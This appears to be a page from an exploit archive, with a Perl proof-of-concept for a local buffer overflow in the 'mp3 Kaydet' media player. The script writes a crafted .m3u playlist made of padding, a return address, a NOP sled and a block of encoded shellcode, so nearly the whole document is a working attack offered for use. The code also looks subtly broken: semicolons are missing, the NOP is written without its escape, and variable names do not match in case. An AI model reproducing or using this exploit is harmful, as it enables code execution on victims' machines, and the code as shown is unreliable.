mp3 Kaydet Local Buffer Overflow



EKU-ID: 902 CVE: OSVDB-ID:
Author: Angel Injection Published: 2011-08-31 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


#!/usr/bin/perl

# Exploit Title: mp3 Kaydet Local Buffer Overflow
# Author: Angel Injection
# Email: Angel-Injection@hotmail.com
# Home Page: http://www.1337day.com http://www.sec-krb.org/vb
# Thanks To: Inj3ct0r Team

my $file= "Exploit.m3u";
my $junk= "\x41" x 1600;
my $ret= "\xEB\x5D\x3E\x5F"
my $nop ="x90" x 20
my $shellcode =
"\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x9a".
"\xb8\xbb\x46\x83\xeb\xfc\xe2\xf4\x66\xd2\x50\x0b\x72\x41\x44\xb9".
"\x65\xd8\x30\x2a\xbe\x9c\x30\x03\xa6\x33\xc7\x43\xe2\xb9\x54\xcd".
"\xd5\xa0\x30\x19\xba\xb9\x50\x0f\x11\x8c\x30\x47\x74\x89\x7b\xdf".
"\x36\x3c\x7b\x32\x9d\x79\x71\x4b\x9b\x7a\x50\xb2\xa1\xec\x9f\x6e".
"\xef\x5d\x30\x19\xbe\xb9\x50\x20\x11\xb4\xf0\xcd\xc5\xa4\xba\xad".
"\x99\x94\x30\xcf\xf6\x9c\xa7\x27\x59\x89\x60\x22\x11\xfb\x8b\xcd".
"\xda\xb4\x30\x36\x86\x15\x30\x06\x92\xe6\xd3\xc8\xd4\xb6\x57\x16".
"\x65\x6e\xdd\x15\xfc\xd0\x88\x74\xf2\xcf\xc8\x74\xc5\xec\x44\x96".
"\xf2\x73\x56\xba\xa1\xe8\x44\x90\xc5\x31\x5e\x20\x1b\x55\xb3\x44".
"\xcf\xd2\xb9\xb9\x4a\xd0\x62\x4f\x6f\x15\xec\xb9\x4c\xeb\xe8\x15".
"\xc9\xeb\xf8\x15\xd9\xeb\x44\x96\xfc\xd0\xaa\x1a\xfc\xeb\x32\xa7".
"\x0f\xd0\x1f\x5c\xea\x7f\xec\xb9\x4c\xd2\xab\x17\xcf\x47\x6b\x2e".
"\x3e\x15\x95\xaf\xcd\x47\x6d\x15\xcf\x47\x6b\x2e\x7f\xf1\x3d\x0f".
"\xcd\x47\x6d\x16\xce\xec\xee\xb9\x4a\x2b\xd3\xa1\xe3\x7e\xc2\x11".
"\x65\x6e\xee\xb9\x4a\xde\xd1\x22\xfc\xd0\xd8\x2b\x13\x5d\xd1\x16".
"\xc3\x91\x77\xcf\x7d\xd2\xff\xcf\x78\x89\x7b\xb5\x30\x46\xf9\x6b".
"\x64\xfa\x97\xd5\x17\xc2\x83\xed\x31\x13\xd3\x34\x64\x0b\xad\xb9".
"\xef\xfc\x44\x90\xc1\xef\xe9\x17\xcb\xe9\xd1\x47\xcb\xe9\xee\x17".
"\x65\x68\xd3\xeb\x43\xbd\x75\x15\x65\x6e\xd1\xb9\x65\x8f\x44\x96".
"\x11\xef\x47\xc5\x5e\xdc\x44\x90\xc8\x47\x6b\x2e\x6a\x32\xbf\x19".
"\xc9\x47\x6d\xb9\x4a\xb8\xbb\x46";
open($File,">$file");
print $File $Junk.$ret.$nop.$shellcode;
close($File);